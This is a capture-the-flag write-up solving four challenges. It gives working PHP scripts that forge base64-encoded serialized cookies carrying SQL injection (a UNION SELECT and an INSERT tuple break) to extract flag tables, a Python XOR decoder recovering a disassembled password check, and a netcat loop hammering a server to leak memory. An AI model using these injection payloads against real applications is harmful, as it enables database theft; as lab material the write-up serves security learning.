0x3004 CTF - Injection1, Injection2, pydis, The Heart Still Bleed Writeup
Injection1:
An easy SQL injection through PHP unserialization: the id field of the unserialized array ends up in the SELECT query.
<?php
// The original cookie value decodes to: a:2:{s:8:"password";s:5:"guest";s:2:"id";i:1;}
$r = unserialize(base64_decode("YToyOntzOjg6InBhc3N3b3JkIjtzOjU6Imd1ZXN0IjtzOjI6ImlkIjtpOjE7fQ=="));
$r["password"] = "guest";
// id is an integer in the original; the replacement string reaches the query unescaped
$r["id"] = "0 union select flag from web50_flag";
echo urlencode(base64_encode(serialize($r))) . "\n";
// 0x3004{SQLi_thr0ugh_53r141iz3}
?>
Injection2:
Another easy SQL injection through unserialization, but this time in an INSERT query.
<?php
class WriteLog {
    public $time = '';
    public $password = 'guest';
    public $id = 1;
    // Constructor
    function __construct($time) {
        $this->time = $time;
    }
    // Destructor
    function __destruct() {
    }
}
// 0x3004{php_0bj3ct_m4k35_1t_3a5y}
// The string handed to the constructor ends up inside the INSERT: the payload
// closes the current VALUES tuple, adds a second row containing the flag
// subselect, and comments out the rest of the query.
$log = Array("password" => new WriteLog("888',0),(null,(select flag from web100_flag ),'pvdttpn04vpos24k0klhcmdke5')-- -"), "id" => 1);
echo urlencode(base64_encode(serialize($log))) . "\n";
//echo serialize($log) . "\n";
?>
pydis:
In this challenge an output is provided: the disassembly of a “check_password” function. Rebuilding the function was easy and fast; then comes the reversing step:
# constants recovered from the disassembled check_password
PASS_ENCODED = [12313, 12304, 12313, 12294, 12342, 12351, 12297, 12318, 12328, 12338, 12288, 12313, 12315, 12313, 12290, 12335, 12317, 12334, 12380, 12407, 12350]
tmp = '{'  # the check starts the chain from '{'
pwd = ""
# each encoded value equals ord(previous char) ^ ord(current char) ^ 12292,
# so brute-force the printable byte that satisfies that relation
for i in range(0, len(PASS_ENCODED)):
    for j in range(32, 127):
        if PASS_ENCODED[i] ^ 12292 == ord(tmp) ^ j:
            tmp = chr(j)
            pwd += tmp
            break
print(pwd)
# from_dis_import_Fl4G
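As an added example (not part of the original writeup), the check can be inverted directly instead of brute-forced: the relation the loop tests means each stored value is ord(prev) ^ ord(cur) ^ 12292, so cur = value ^ 12292 ^ ord(prev). The encode() function is an assumed reconstruction of how the constants were produced; the constants themselves are the ones from the writeup.

```python
# Added example, not from the original writeup. The constants are the ones
# recovered from the disassembly; encode() is an assumption about how they
# were generated, decode() is its direct inverse.

KEY = 12292   # 0x3004, the XOR constant embedded in check_password
SEED = '{'    # the chain starts from this character
PASS_ENCODED = [12313, 12304, 12313, 12294, 12342, 12351, 12297, 12318,
                12328, 12338, 12288, 12313, 12315, 12313, 12290, 12335,
                12317, 12334, 12380, 12407, 12350]


def encode(password, key=KEY, seed=SEED):
    """Assumed generator: each value mixes the previous plaintext char,
    the current one and a fixed key. With the key in the bytecode, this
    hides nothing once the constants are read out."""
    out = []
    prev = seed
    for ch in password:
        out.append(ord(prev) ^ ord(ch) ^ key)
        prev = ch
    return out


def decode(encoded, key=KEY, seed=SEED):
    """Direct inverse of encode(): cur = value ^ key ^ ord(prev).
    Rejects non-printable bytes, which signal a wrong key or seed."""
    chars = []
    prev = seed
    for value in encoded:
        code = value ^ key ^ ord(prev)
        if not 32 <= code < 127:
            raise ValueError("non-printable byte at %d: wrong key or seed?" % len(chars))
        prev = chr(code)
        chars.append(prev)
    return "".join(chars)


if __name__ == "__main__":
    pwd = decode(PASS_ENCODED)
    print(pwd)                          # prints from_dis_import_Fl4G}
    assert encode(pwd) == PASS_ENCODED  # round trip confirms the model of the check
```

The trailing "}" shows the stored password was the braced flag minus the leading "{", which is exactly the seed the loop starts from.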
The Heart Still Bleed:
Just loop on the host, sending “1024” to the server's stdin; after a while this leads you to the flag:
while true;do perl -e 'print "1024\n"' | nc 23.98.66.138 3333 ; done
Razor4x